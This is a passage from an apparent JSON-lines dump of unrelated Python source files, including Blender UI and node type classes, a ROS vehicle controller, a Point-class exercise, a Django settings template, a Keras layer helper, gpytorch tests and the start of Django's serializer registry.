not None) and (attr in bl_rna.properties):\n return setattr(properties, attr, value)\n return super().__setattr__(attr, value)\n\n def __delattr__(self, attr):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is not None) and (attr in bl_rna.properties):\n return delattr(properties, attr)\n return super().__delattr__(attr)\n\n from _bpy import (\n _rna_gizmo_target_set_handler as target_set_handler,\n _rna_gizmo_target_get_value as target_get_value,\n _rna_gizmo_target_set_value as target_set_value,\n _rna_gizmo_target_get_range as target_get_range,\n )\n\n # Convenience wrappers around private `_gpu` module.\n def draw_custom_shape(self, shape, *, matrix=None, select_id=None):\n \"\"\"\n Draw a shape created form :class:`bpy.types.Gizmo.draw_custom_shape`.\n\n :arg shape: The cached shape to draw.\n :type shape: Undefined.\n :arg matrix: 4x4 matrix, when not given\n :class:`bpy.types.Gizmo.matrix_world` is used.\n :type matrix: :class:`mathutils.Matrix`\n :arg select_id: The selection id.\n Only use when drawing within :class:`bpy.types.Gizmo.draw_select`.\n :type select_it: int\n \"\"\"\n import gpu\n\n if matrix is None:\n matrix = self.matrix_world\n\n batch, shader = shape\n shader.bind()\n\n if select_id is not None:\n gpu.select.load_id(select_id)\n else:\n if self.is_highlight:\n color = (*self.color_highlight, self.alpha_highlight)\n else:\n color = (*self.color, self.alpha)\n shader.uniform_float(\"color\", color)\n\n with gpu.matrix.push_pop():\n gpu.matrix.multiply_matrix(matrix)\n batch.draw()\n\n @staticmethod\n def new_custom_shape(type, verts):\n \"\"\"\n Create a new shape that can be passed to :class:`bpy.types.Gizmo.draw_custom_shape`.\n\n :arg type: The type of shape to create in (POINTS, LINES, TRIS, LINE_STRIP).\n :type type: string\n :arg verts: Coordinates.\n :type verts: sequence of of 2D or 3D coordinates.\n :arg display_name: Optional callback that takes the full path, returns the name to display.\n :type display_name: Callable that takes a string and returns a string.\n :return: The newly created shape.\n :rtype: Undefined (it may change).\n \"\"\"\n import gpu\n from gpu.types import (\n GPUBatch,\n GPUVertBuf,\n GPUVertFormat,\n )\n dims = len(verts[0])\n if dims not in {2, 3}:\n raise ValueError(\"Expected 2D or 3D vertex\")\n fmt = GPUVertFormat()\n pos_id = fmt.attr_add(id=\"pos\", comp_type='F32', len=dims, fetch_mode='FLOAT')\n vbo = GPUVertBuf(len=len(verts), format=fmt)\n vbo.attr_fill(id=pos_id, data=verts)\n batch = GPUBatch(type=type, buf=vbo)\n shader = gpu.shader.from_builtin('3D_UNIFORM_COLOR' if dims == 3 else '2D_UNIFORM_COLOR')\n batch.program_set(shader)\n return (batch, shader)\n\n\n# Dummy class to keep the reference in `bpy_types_dict` and avoid\n# erros like: \"TypeError: expected GizmoGroup subclass of class ...\"\nclass GizmoGroup(StructRNA):\n __slots__ = ()\n\n\n# Only defined so operators members can be used by accessing self.order\n# with doc generation 'self.properties.bl_rna.properties' can fail\nclass Operator(StructRNA, metaclass=RNAMeta):\n __slots__ = ()\n\n def __getattribute__(self, attr):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is not None) and (attr in bl_rna.properties):\n return getattr(properties, attr)\n return super().__getattribute__(attr)\n\n def __setattr__(self, attr, value):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is not None) and (attr in bl_rna.properties):\n return setattr(properties, attr, value)\n return super().__setattr__(attr, value)\n\n def __delattr__(self, attr):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is not None) and (attr in bl_rna.properties):\n return delattr(properties, attr)\n return super().__delattr__(attr)\n\n def as_keywords(self, ignore=()):\n \"\"\"Return a copy of the properties as a dictionary\"\"\"\n ignore = ignore + (\"rna_type\",)\n return {attr: getattr(self, attr)\n for attr in self.properties.rna_type.properties.keys()\n if attr not in ignore}\n\n\nclass Macro(StructRNA):\n # bpy_types is imported before ops is defined\n # so we have to do a local import on each run\n __slots__ = ()\n\n @classmethod\n def define(self, opname):\n from _bpy import ops\n return ops.macro_define(self, opname)\n\n\nclass PropertyGroup(StructRNA, metaclass=RNAMetaPropGroup):\n __slots__ = ()\n\n\nclass RenderEngine(StructRNA, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass KeyingSetInfo(StructRNA, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass AddonPreferences(StructRNA, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass _GenericUI:\n __slots__ = ()\n\n @classmethod\n def _dyn_ui_initialize(cls):\n draw_funcs = getattr(cls.draw, \"_draw_funcs\", None)\n\n if draw_funcs is None:\n\n def draw_ls(self, context):\n # ensure menus always get default context\n operator_context_default = self.layout.operator_context\n\n # Support filtering out by owner\n workspace = context.workspace\n if workspace.use_filter_by_owner:\n owner_names = {owner_id.name for owner_id in workspace.owner_ids}\n else:\n owner_names = None\n\n for func in draw_ls._draw_funcs:\n\n # Begin 'owner_id' filter.\n if owner_names is not None:\n owner_id = getattr(func, \"_owner\", None)\n if owner_id is not None:\n if func._owner not in owner_names:\n continue\n # End 'owner_id' filter.\n\n # so bad menu functions don't stop\n # the entire menu from drawing\n try:\n func(self, context)\n except:\n import traceback\n traceback.print_exc()\n\n self.layout.operator_context = operator_context_default\n\n draw_funcs = draw_ls._draw_funcs = [cls.draw]\n cls.draw = draw_ls\n\n return draw_funcs\n\n @staticmethod\n def _dyn_owner_apply(draw_func):\n from _bpy import _bl_owner_id_get\n owner_id = _bl_owner_id_get()\n if owner_id is not None:\n draw_func._owner = owner_id\n\n @classmethod\n def is_extended(cls):\n return bool(getattr(cls.draw, \"_draw_funcs\", None))\n\n @classmethod\n def append(cls, draw_func):\n \"\"\"\n Append a draw function to this menu,\n takes the same arguments as the menus draw function\n \"\"\"\n draw_funcs = cls._dyn_ui_initialize()\n cls._dyn_owner_apply(draw_func)\n draw_funcs.append(draw_func)\n\n @classmethod\n def prepend(cls, draw_func):\n \"\"\"\n Prepend a draw function to this menu, takes the same arguments as\n the menus draw function\n \"\"\"\n draw_funcs = cls._dyn_ui_initialize()\n cls._dyn_owner_apply(draw_func)\n draw_funcs.insert(0, draw_func)\n\n @classmethod\n def remove(cls, draw_func):\n \"\"\"Remove a draw function that has been added to this menu\"\"\"\n draw_funcs = cls._dyn_ui_initialize()\n try:\n draw_funcs.remove(draw_func)\n except ValueError:\n pass\n\n\nclass Panel(StructRNA, _GenericUI, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass UIList(StructRNA, _GenericUI, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass Header(StructRNA, _GenericUI, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass Menu(StructRNA, _GenericUI, metaclass=RNAMeta):\n __slots__ = ()\n\n def path_menu(self, searchpaths, operator, *,\n props_default=None, prop_filepath=\"filepath\",\n filter_ext=None, filter_path=None, display_name=None,\n add_operator=None):\n \"\"\"\n Populate a menu from a list of paths.\n\n :arg searchpaths: Paths to scan.\n :type searchpaths: sequence of strings.\n :arg operator: The operator id to use with each file.\n :type operator: string\n :arg prop_filepath: Optional operator filepath property (defaults to \"filepath\").\n :type prop_filepath: string\n :arg props_default: Properties to assign to each operator.\n :type props_default: dict\n :arg filter_ext: Optional callback that takes the file extensions.\n\n Returning false excludes the file from the list.\n\n :type filter_ext: Callable that takes a string and returns a bool.\n :arg display_name: Optional callback that takes the full path, returns the name to display.\n :type display_name: Callable that takes a string and returns a string.\n \"\"\"\n\n layout = self.layout\n\n import os\n import bpy.utils\n\n layout = self.layout\n\n if not searchpaths:\n layout.label(text=\"* Missing Paths *\")\n\n # collect paths\n files = []\n for directory in searchpaths:\n files.extend([\n (f, os.path.join(directory, f))\n for f in os.listdir(directory)\n if (not f.startswith(\".\"))\n if ((filter_ext is None) or\n (filter_ext(os.path.splitext(f)[1])))\n if ((filter_path is None) or\n (filter_path(f)))\n ])\n\n files.sort()\n\n col = layout.column(align=True)\n\n for f, filepath in files:\n # Intentionally pass the full path to 'display_name' callback,\n # since the callback may want to use part a directory in the name.\n row = col.row(align=True)\n name = display_name(filepath) if display_name else bpy.path.display_name(f)\n props = row.operator(\n operator,\n text=name,\n translate=False,\n )\n\n if props_default is not None:\n for attr, value in props_default.items():\n setattr(props, attr, value)\n\n setattr(props, prop_filepath, filepath)\n if operator == \"script.execute_preset\":\n props.menu_idname = self.bl_idname\n\n if add_operator:\n props = row.operator(add_operator, text=\"\", icon='REMOVE')\n props.name = name\n props.remove_name = True\n\n if add_operator:\n wm = bpy.data.window_managers[0]\n\n layout.separator()\n row = layout.row()\n\n sub = row.row()\n sub.emboss = 'NORMAL'\n sub.prop(wm, \"preset_name\", text=\"\")\n\n props = row.operator(add_operator, text=\"\", icon='ADD')\n props.name = wm.preset_name\n\n def draw_preset(self, _context):\n \"\"\"\n Define these on the subclass:\n - preset_operator (string)\n - preset_subdir (string)\n\n Optionally:\n - preset_add_operator (string)\n - preset_extensions (set of strings)\n - preset_operator_defaults (dict of keyword args)\n \"\"\"\n import bpy\n ext_valid = getattr(self, \"preset_extensions\", {\".py\", \".xml\"})\n props_default = getattr(self, \"preset_operator_defaults\", None)\n add_operator = getattr(self, \"preset_add_operator\", None)\n self.path_menu(\n bpy.utils.preset_paths(self.preset_subdir),\n self.preset_operator,\n props_default=props_default,\n filter_ext=lambda ext: ext.lower() in ext_valid,\n add_operator=add_operator,\n )\n\n @classmethod\n def draw_collapsible(cls, context, layout):\n # helper function for (optionally) collapsed header menus\n # only usable within headers\n if context.area.show_menus:\n # Align menus to space them closely.\n layout.row(align=True).menu_contents(cls.__name__)\n else:\n layout.menu(cls.__name__, icon='COLLAPSEMENU')\n\n\nclass NodeTree(bpy_types.ID, metaclass=RNAMetaPropGroup):\n __slots__ = ()\n\n\nclass Node(StructRNA, metaclass=RNAMetaPropGroup):\n __slots__ = ()\n\n @classmethod\n def poll(cls, _ntree):\n return True\n\n\nclass NodeInternal(Node):\n __slots__ = ()\n\n\nclass NodeSocket(StructRNA, metaclass=RNAMetaPropGroup):\n __slots__ = ()\n\n @property\n def links(self):\n \"\"\"List of node links from or to this socket. Warning: takes O(len(nodetree.links)) time.\"\"\"\n return tuple(\n link for link in self.id_data.links\n if (link.from_socket == self or\n link.to_socket == self))\n\n\nclass NodeSocketInterface(StructRNA, metaclass=RNAMetaPropGroup):\n __slots__ = ()\n\n\n# These are intermediate subclasses, need a bpy type too\nclass CompositorNode(NodeInternal):\n __slots__ = ()\n\n @classmethod\n def poll(cls, ntree):\n return ntree.bl_idname == 'CompositorNodeTree'\n\n def update(self):\n self.tag_need_exec()\n\n\nclass ShaderNode(NodeInternal):\n __slots__ = ()\n\n @classmethod\n def poll(cls, ntree):\n return ntree.bl_idname == 'ShaderNodeTree'\n\n\nclass TextureNode(NodeInternal):\n __slots__ = ()\n\n @classmethod\n def poll(cls, ntree):\n return ntree.bl_idname == 'TextureNodeTree'\n"} {"ext": "py", "sha": "1a2eb231f732213c6256302bf03a1bd5272aacd8", "content": "import rospy\n\nfrom yaw_controller import YawController\nfrom pid import PID \nfrom lowpass import LowPassFilter\n\n\n\nGAS_DENSITY = 2.858\nONE_MPH = 0.44704\n\n\nclass Controller(object):\n def __init__(self, wheel_base, steer_ratio, max_lat_accel, max_steer_angle, accel_limit, decel_limit, vehicle_mass, fuel_capacity, brake_deadband,wheel_radius): \n\n\tself.yaw_controller = YawController(wheel_base, steer_ratio, 0.1, max_lat_accel, max_steer_angle)\n\tkp = 0.3\n\tki = 0.1\n\tkd = 0.\n\tmn = 0.\n\tmx = 0.2\n\tself.throttle_controller = PID(kp,ki,kd,mn,mx)\n\n\ttau = 0.5 #1/(2pi*tau) cutoff frequency\n\tts = 0.02 #sample_time\n\tself.vel_lpf = LowPassFilter(tau, ts)\n\n\tself.vehicle_mass = vehicle_mass\n\tself.fuel_capacity = fuel_capacity\n\tself.brake_deadband = brake_deadband\n\tself.decel_limit = decel_limit\n\tself.accel_limit = accel_limit\n\tself.wheel_radius = wheel_radius\n\n\tself.last_time = rospy.get_time()\n\n\n\n def control(self, current_vel, dbw_enabled, linear_vel,angular_vel):\n\n # TODO: Change the arg, kwarg list to suit your needs\n # Return throttle, brake, steer\n\n\tif not dbw_enabled:\n\t self.throttle_controller.reset()\n\t return 0.0, 0., 0.\n\n\tcurrent_vel = self.vel_lpf.filt(current_vel)\n\t \n\n\t# rospy.logwarn(\"Angular vel : {0}\".format(angular_vel))\n\t# rospy.logwarn(\"target vel : {0}\".format(linear_vel))\n\t# rospy.logwarn(\"current vel : {0}\".format(current_vel))\n\n\tsteering = self.yaw_controller.get_steering(linear_vel, angular_vel, current_vel)\n\n\tvel_error = linear_vel - current_vel\n\tself.last_vel = current_vel\n\n\tcurrent_time = rospy.get_time()\n\tsample_time = current_time - self.last_time\n\tself.last_time = current_time\n\n\tthrottle = self.throttle_controller.step(vel_error, sample_time)\n\tbrake = 0\n\n\tif linear_vel == 0. and current_vel < 1.0:\n\t throttle = 0\n\t brake = 400 #N*m to hold the car when we stop at light\n\telif throttle < 0.1 and vel_error < 0:\n\t throttle = 0\n \t decel = max(vel_error, self.decel_limit)\n\t brake = abs(decel)*self.vehicle_mass*self.wheel_radius\n\n\treturn throttle, brake, steering\n"} {"ext": "py", "sha": "1a2eb275e3a88ee2fe89218b22290c923339ca59", "content": "# Rewrite the distance function from the chapter titled Fruitful functions\n# so that it takes two Points as parameters instead of four numbers.\n\nclass Point:\n \"\"\" Point class represents and manipulates x,y coords. \"\"\"\n\n def __init__(self, x=0, y=0):\n \"\"\" Create a new point at the origin \"\"\"\n self.x = x\n self.y = y\n\n def __str__(self):\n return \"({0}, {1})\".format(self.x, self.y)\n\n def distance_from_origin(self):\n \"\"\" Compute my distance from the origin \"\"\"\n return ((self.x ** 2) + (self.y ** 2)) ** 0.5\n\n def halfway(self, target):\n \"\"\" Return the halfway point between myself and the target \"\"\"\n mx = (self.x + target.x) / 2\n my = (self.y + target.y) / 2\n return Point(mx, my)\n\n# Add a method reflect_x to Point which returns a new Point,\n# one which is the reflection of the point about the x-axis. For example, Point(3, 5).reflect_x() is (3, -5)\n\n def reflect_x(self):\n refx = (self.x)\n refy = -(self.y)\n return Point(refx, refy)\n\n# Rewrite the distance function from the chapter titled Fruitful functions\n # so that it takes two Points as parameters instead of four numbers.\n def distance(p1, p2):\n dx = p2.x - p1.x\n dy = p2.y - p1.y\n dsquared = dx*dx + dy*dy\n result = dsquared**0.5\n return result\n\n# Add a method slope_from_origin which returns the slope of the line joining the origin to the point. For example,\n# Point(4, 10).slope_from_origin()\n# 2.5\n\n def slope_from_origin(self):\n return self.y/self.x\n# What cases will cause this method to fail? -> division by zero\n\n# The equation of a straight line is “y = ax + b”, (or perhaps “y = mx + c”).\n# The coefficients a and b completely describe the line.\n# Write a method in the Point class so that if a point instance is given another point,\n# it will compute the equation of the straight line joining the two points.\n# It must return the two coefficients as a tuple of two values. For example,\n# print(Point(4, 11).get_line_to(Point(6, 15)))\n# (2, 3)\n\n def get_line_to(self, target):\n mx = target.x-self.x\n my = target.y-self.y\n slope = my/mx\n b = self.y - (slope * self.x)\n return (slope, b)\n\nprint(Point(4, 11).get_line_to(Point(6, 15)))\n"} {"ext": "py", "sha": "1a2eb2a46d6034a72443905fc5ceafa74652e189", "content": "from proteus import Context\nfrom proteus import Comm\ncomm = Comm.get()\nctx = Context.get()\n\n# simulation flags for error analysis\n#\n# simFlagsList is initialized in proteus.iproteus\n#\nsimFlagsList[0]['errorQuantities']=['u']\nsimFlagsList[0]['errorTypes']= ['numericalSolution'] #compute error in soln and glob. mass bal\nsimFlagsList[0]['errorNorms']= ['L2','H1'] #compute L2 norm in space or H0 or ...\nsimFlagsList[0]['errorTimes']= ['Last'] #'All', 'Last'\nsimFlagsList[0]['echo']=True\n\n#\nstart\nquit\n"} {"ext": "py", "sha": "1a2eb3e02d38f25d69dea4a31c9eb8d46c026644", "content": "\"\"\"\nDjango settings for bbs project.\n\nGenerated by 'django-admin startproject' using Django 1.11.7.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.11/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.11/ref/settings/\n\"\"\"\n\nimport os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '6gmpi&j6a5#sbn^d$v41)5xx8j@1yq5bi3_-p3%pu-!e=0m$r!'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'bbs.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'bbs.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.11/howto/static-files/\n\nSTATIC_URL = '/static/'\n"} {"ext": "py", "sha": "1a2eb3e939bb20fab5e85474d5b1d38f42136d12", "content": "from keras_applications import get_submodules_from_kwargs\n\n\ndef Conv2dBn(\n filters,\n kernel_size,\n strides=(1, 1),\n padding='valid',\n data_format=None,\n dilation_rate=(1, 1),\n activation=None,\n activation_dtype=None,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n use_batchnorm=False,\n **kwargs\n):\n \"\"\"Extension of Conv2D layer with batchnorm\"\"\"\n\n conv_name, act_name, bn_name = None, None, None\n block_name = kwargs.pop('name', None)\n backend, layers, models, keras_utils = get_submodules_from_kwargs(kwargs)\n\n if block_name is not None:\n conv_name = block_name + '_conv'\n\n if block_name is not None and activation is not None:\n act_str = activation.__name__ if callable(activation) else str(activation)\n act_name = block_name + '_' + act_str\n\n if block_name is not None and use_batchnorm:\n bn_name = block_name + '_bn'\n\n bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1\n\n def wrapper(input_tensor):\n\n x = layers.Conv2D(\n filters=filters,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n data_format=data_format,\n dilation_rate=dilation_rate,\n activation=None,\n use_bias=not (use_batchnorm),\n kernel_initializer=kernel_initializer,\n bias_initializer=bias_initializer,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n activity_regularizer=activity_regularizer,\n kernel_constraint=kernel_constraint,\n bias_constraint=bias_constraint,\n name=conv_name,\n )(input_tensor)\n\n if use_batchnorm:\n x = layers.BatchNormalization(axis=bn_axis, name=bn_name)(x)\n\n if activation:\n if activation_dtype is None:\n x = layers.Activation(activation, name=act_name)(x)\n else:\n x = layers.Activation(activation, name=act_name, dtype=activation_dtype)(x)\n\n return x\n\n return wrapper\n"} {"ext": "py", "sha": "1a2eb4a9fef6c85cf3a67200f11d7b95a09f8f7c", "content": "#!/usr/bin/env python3\n\nimport os\nimport random\nimport unittest\nfrom math import exp, pi\n\nimport gpytorch\nimport torch\nfrom gpytorch.distributions import MultivariateNormal\nfrom gpytorch.kernels import RBFKernel, ScaleKernel\nfrom gpytorch.likelihoods import GaussianLikelihood, FixedNoiseGaussianLikelihood\nfrom gpytorch.means import ConstantMean\nfrom gpytorch.priors import SmoothedBoxPrior\nfrom gpytorch.test.utils import least_used_cuda_device\nfrom torch import optim\n\n\nclass ExactGPModel(gpytorch.models.ExactGP):\n def __init__(self, train_inputs, train_targets, likelihood):\n super(ExactGPModel, self).__init__(train_inputs, train_targets, likelihood)\n self.mean_module = ConstantMean(prior=SmoothedBoxPrior(-1, 1))\n self.rbf_covar_module = RBFKernel(lengthscale_prior=SmoothedBoxPrior(exp(-3), exp(3), sigma=0.1))\n self.covar_module = ScaleKernel(self.rbf_covar_module)\n\n def forward(self, x):\n mean_x = self.mean_module(x)\n covar_x = self.covar_module(x)\n return MultivariateNormal(mean_x, covar_x)\n\n\nclass TestWhiteNoiseGPRegression(unittest.TestCase):\n def setUp(self):\n if os.getenv(\"UNLOCK_SEED\") is None or os.getenv(\"UNLOCK_SEED\").lower() == \"false\":\n self.rng_state = torch.get_rng_state()\n torch.manual_seed(1)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(1)\n random.seed(1)\n\n def tearDown(self):\n if hasattr(self, \"rng_state\"):\n torch.set_rng_state(self.rng_state)\n\n def _get_data(self, cuda=False):\n device = torch.device(\"cuda\") if cuda else torch.device(\"cpu\")\n # Simple training data: let's try to learn a sine function\n train_x = torch.linspace(0, 1, 11, device=device)\n train_y = torch.sin(train_x * (2 * pi))\n test_x = torch.linspace(0, 1, 51, device=device)\n test_y = torch.sin(test_x * (2 * pi))\n return train_x, test_x, train_y, test_y\n\n def test_posterior_latent_gp_and_likelihood_without_optimization(self, cuda=False):\n train_x, test_x, train_y, test_y = self._get_data(cuda=cuda)\n with gpytorch.settings.debug(False):\n # We're manually going to set the hyperparameters to be ridiculous\n likelihood = FixedNoiseGaussianLikelihood(torch.ones(11) * 1e-8)\n gp_model = ExactGPModel(train_x, train_y, likelihood)\n # Update lengthscale prior to accommodate extreme parameters\n gp_model.rbf_covar_module.initialize(lengthscale=exp(-6))\n gp_model.mean_module.initialize(constant=0)\n\n if cuda:\n gp_model.cuda()\n likelihood.cuda()\n\n # Compute posterior distribution\n gp_model.eval()\n likelihood.eval()\n\n # Let's see how our model does, conditioned with weird hyperparams\n # The posterior should fit all the data\n function_predictions = likelihood(gp_model(train_x))\n\n self.assertLess(torch.norm(function_predictions.mean - train_y), 1e-3)\n self.assertLess(torch.norm(function_predictions.variance), 5e-3)\n\n # It shouldn't fit much else though\n test_function_predictions = gp_model(torch.tensor([1.1]).type_as(test_x))\n\n self.assertLess(torch.norm(test_function_predictions.mean - 0), 1e-4)\n self.assertLess(torch.norm(test_function_predictions.variance - gp_model.covar_module.outputscale), 1e-4)\n\n def test_posterior_latent_gp_and_likelihood_without_optimization_cuda(self):\n if torch.cuda.is_available():\n with least_used_cuda_device():\n self.test_posterior_latent_gp_and_likelihood_without_optimization(cuda=True)\n\n def test_posterior_latent_gp_and_likelihood_with_optimization(self, cuda=False):\n train_x, test_x, train_y, test_y = self._get_data(cuda=cuda)\n # We're manually going to set the hyperparameters to something they shouldn't be\n likelihood = FixedNoiseGaussianLikelihood(torch.ones(11) * 0.001)\n gp_model = ExactGPModel(train_x, train_y, likelihood)\n mll = gpytorch.ExactMarginalLogLikelihood(likelihood, gp_model)\n gp_model.rbf_covar_module.initialize(lengthscale=exp(1))\n gp_model.mean_module.initialize(constant=0)\n\n if cuda:\n gp_model.cuda()\n likelihood.cuda()\n\n # Find optimal model hyperparameters\n gp_model.train()\n likelihood.train()\n\n optimizer = optim.Adam(list(gp_model.parameters()) + list(likelihood.parameters()), lr=0.1)\n optimizer.n_iter = 0\n with gpytorch.settings.debug(False):\n for _ in range(75):\n optimizer.zero_grad()\n output = gp_model(train_x)\n loss = -mll(output, train_y)\n loss.backward()\n optimizer.n_iter += 1\n optimizer.step()\n\n for param in gp_model.parameters():\n self.assertTrue(param.grad is not None)\n self.assertGreater(param.grad.norm().item(), 0)\n for param in likelihood.parameters():\n self.assertTrue(param.grad is not None)\n self.assertGreater(param.grad.norm().item(), 0)\n optimizer.step()\n\n # Test the model\n gp_model.eval()\n likelihood.eval()\n test_function_predictions = likelihood(gp_model(test_x))\n mean_abs_error = torch.mean(torch.abs(test_y - test_function_predictions.mean))\n\n self.assertLess(mean_abs_error.squeeze().item(), 0.05)\n\n def test_posterior_latent_gp_and_likelihood_with_optimization_cuda(self):\n if torch.cuda.is_available():\n with least_used_cuda_device():\n self.test_posterior_latent_gp_and_likelihood_with_optimization(cuda=True)\n\n def test_posterior_latent_gp_and_likelihood_fast_pred_var(self, cuda=False):\n train_x, test_x, train_y, test_y = self._get_data(cuda=cuda)\n with gpytorch.settings.fast_pred_var(), gpytorch.settings.debug(False):\n # We're manually going to set the hyperparameters to something they shouldn't be\n likelihood = GaussianLikelihood(noise_prior=SmoothedBoxPrior(exp(-3), exp(3), sigma=0.1))\n gp_model = ExactGPModel(train_x, train_y, likelihood)\n mll = gpytorch.mlls.ExactMarginalLogLikelihood(likelihood, gp_model)\n gp_model.rbf_covar_module.initialize(lengthscale=exp(1))\n gp_model.mean_module.initialize(constant=0)\n likelihood.initialize(noise=exp(1))\n\n if cuda:\n gp_model.cuda()\n likelihood.cuda()\n\n # Find optimal model hyperparameters\n gp_model.train()\n likelihood.train()\n optimizer = optim.Adam(list(gp_model.parameters()) + list(likelihood.parameters()), lr=0.1)\n optimizer.n_iter = 0\n for _ in range(50):\n optimizer.zero_grad()\n output = gp_model(train_x)\n loss = -mll(output, train_y)\n loss.backward()\n optimizer.n_iter += 1\n optimizer.step()\n\n for param in gp_model.parameters():\n self.assertTrue(param.grad is not None)\n self.assertGreater(param.grad.norm().item(), 0)\n for param in likelihood.parameters():\n self.assertTrue(param.grad is not None)\n self.assertGreater(param.grad.norm().item(), 0)\n optimizer.step()\n\n # Test the model\n gp_model.eval()\n likelihood.eval()\n # Set the cache\n test_function_predictions = likelihood(gp_model(train_x))\n\n # Now bump up the likelihood to something huge\n # This will make it easy to calculate the variance\n likelihood.raw_noise.data.fill_(3)\n test_function_predictions = likelihood(gp_model(train_x))\n\n noise = likelihood.noise\n var_diff = (test_function_predictions.variance - noise).abs()\n\n self.assertLess(torch.max(var_diff / noise), 0.05)\n\n def test_posterior_latent_gp_and_likelihood_fast_pred_var_cuda(self):\n if torch.cuda.is_available():\n with least_used_cuda_device():\n self.test_posterior_latent_gp_and_likelihood_fast_pred_var(cuda=True)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"} {"ext": "py", "sha": "1a2eb4f6cc3c7505146763fafeed5e28062e1e07", "content": "\"\"\"\nInterfaces for serializing Django objects.\n\nUsage::\n\n from django.core import serializers\n json = serializers.serialize(\"json\", some_query_set)\n objects = list(serializers.deserialize(\"json\", json))\n\nTo add your own serializers, use the SERIALIZATION_MODULES setting::\n\n SERIALIZATION_MODULES = {\n \"csv\" : \"path.to.csv.serializer\",\n \"txt\" : \"path.to.txt.serializer\",\n }\n\n\"\"\"\n\nfrom django.conf import settings\nfrom django.utils import importlib\n\n# Built-in serializers\nBUILTIN_SERIALIZERS = {\n \"xml\" : \"django.core.serializers.xml_serializer\",\n \"python\" : \"django.core.serializers.python\",\n \"json\" : \"django.core.serializers.json\",\n}\n\n# Check for PyYaml and register the serializer if it's available.\ntry:\n import yaml\n BUILTIN_SERIALIZERS[\"yaml\"] = \"django.core.serializers.pyyaml\"\nexcept ImportError:\n pass\n\n_serializers = {}\n\ndef register_serializer(format, serializer_module, serializers=None):\n \"\"\"\"Register a new serializer. \n \n ``serializer_module`` should be the fully qualified module name\n for the serializer.\n \n If ``serializers`` is provided, the registration will be added\n to the provided dictionary.\n \n If ``serializers`` is not provided, the registration will be made\n directly into the global register of serializers. Adding serializers\n directly is not a thread-safe operation.\n \"\"\"\n module = importlib.import_module(serializer_module)\n if serializers is None:\n _serializers[format] = module\n else:\n serializers[format] = module\n \ndef unregister_serializer(format):\n \"Unregister a given serializer. This is not a thread-safe operation.\"\n del _serializers[format]\n\ndef get_serializer(format):\n if not _serializers:\n _load_serializers()\n return _serializers[format].Serializer\n\ndef get_serializer_formats():\n if not _serializers:\n _load_serializers()\n return _serializers.keys()\n\ndef get_public_serializer_formats():\n if not _serializers:\n _load_serializers()\n return [k for k, v in _serializers.iteritems() if not v.Serializer.internal_use_only]\n\ndef get_deserializer(format):\n if not _serializers:\n _load_serializers()\n return _serializers[format].Deserializer\n\ndef serialize(format, queryset, **options):\n \"\"\"\n Serialize a 